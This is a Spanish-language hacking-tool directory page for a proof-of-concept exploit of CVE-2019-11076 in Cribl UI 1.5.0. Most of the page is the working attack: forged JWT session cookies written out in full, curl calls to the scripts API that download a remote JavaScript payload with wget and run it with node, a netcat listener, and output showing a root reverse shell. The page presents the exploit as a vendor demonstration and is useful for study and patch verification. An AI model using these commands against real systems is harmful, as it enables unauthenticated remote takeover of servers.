Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
poc-cribl-rce — CVE-2019-11076 - Cribl UI 1.5.0 permite a atacantes remotos ejecutar comandos arbitrarios mediante una solicitud web no autenticada. | Kitploit
Herramientas/GitHubGitHub/livehybrid/poc-cribl-rce
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebComando y ControlAutenticaciónHerramienta de Acceso Remoto
GitHublivehybrid/poc-cribl-rce

poc-cribl-rce

CVE-2019-11076 - Cribl UI 1.5.0 permite a atacantes remotos ejecutar comandos arbitrarios mediante una solicitud web no autenticada.

Ver Repositorio
81hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descargo de responsabilidad

Esto es solo con fines informativos/educativos.
Esto se ha elaborado para demostrar una inseguridad en la herramienta, de modo que el proveedor pueda verificar una corrección.

Información

Probado en Cribl v1.5.0 - Las versiones anteriores no se probaron, pero probablemente sean vulnerables.
Un token JWT válido puede transferirse e inyectarse en la sesión de otra instancia de Cribl, otorgando al usuario acceso no autorizado.
Además, la clave de cifrado utilizada para generar el JWT/Sesión puede usarse para crear una sesión válida para cualquier nombre de usuario, con una caducidad extendida.

Esto, combinado con la capacidad de ejecutar scripts dentro de Cribl, permite a un atacante remoto ejecutar código malicioso en una instancia de Cribl para obtener un mayor control.
Un ejemplo de ello puede verse a continuación: usando la página de scripts y un token JWT de larga caducidad, fue posible crear una reverse shell.

Probado usando Docker (Alpine).

Ejecución

Primero, modifica (el nombre del host remoto) y sube tu shell.js a tu servidor web. El archivo contiene código NodeJS para crear una reverse shell hacia tu sitio web.
El servidor debe tener acceso de red saliente a tu host/puerto remoto.

En segundo lugar, configura un listener en tu host remoto, en el puerto que coincida con shell.js:

root@kitploit:~
nc -lvp 6669

Ajusta los siguientes comandos curl con tu archivo remoto.
Ejecuta los comandos CURL en orden; las salidas deberían coincidir aproximadamente con las sangrías de abajo.

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"runme","command":"/usr/bin/wget","args":["http://yourURL/cribl.js","-P","/opt"],"env":{}}' --compressed

"count":1,"items":[{"command":"/usr/bin/wget","args":["http://yourURL/cribl.js","-P","/opt"],"env":{},"id":"runme"}]}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts/runme/run' \
-H 'Content-Type: application/json' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU0OTUyMTU5fQ.W4YDcUJhshv2R25UcumlP4H-2vaCIiJL0hME4eZFIW0' \
--data-binary '{}' --compressed

{"pid":414,"stdout":"N/A","stderr":"N/A"}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts' \
 -H 'Content-Type: application/json'\
 -H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{"id":"reverseit","command":"node","args":["/opt/cribl.js"],"env":{}}' --compressed

"count":1,"items":[{"command":"node","args":["/opt/cribl.js"],"env":{},"id":"reverseit"}]}

root@kitploit:~
curl 'http://CRIBL_URL:9000/api/v1/system/scripts/reverseit/run' \
-H 'Cookie: cribl_auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjo5OTk5OTk5OTk5fQ.lnXNKawtPIvfUR8D6RzrU5U1-_AHuPP1StShu4XiIFY' \
--data-binary '{}' --compressed

{"pid":353,"stdout":"N/A","stderr":"N/A"}

Salida

root@kitploit:~
Listening on [0.0.0.0] (family 0, port 6669)  
Connection from [188.29.XXX.XXX] port 6669 [tcp/*] accepted (family 2, sport 13720)  
> whoami  
< root  
  
> ls /  
< bin  
< dev  
< etc  
< home  
< lib  
...
Descargar herramienta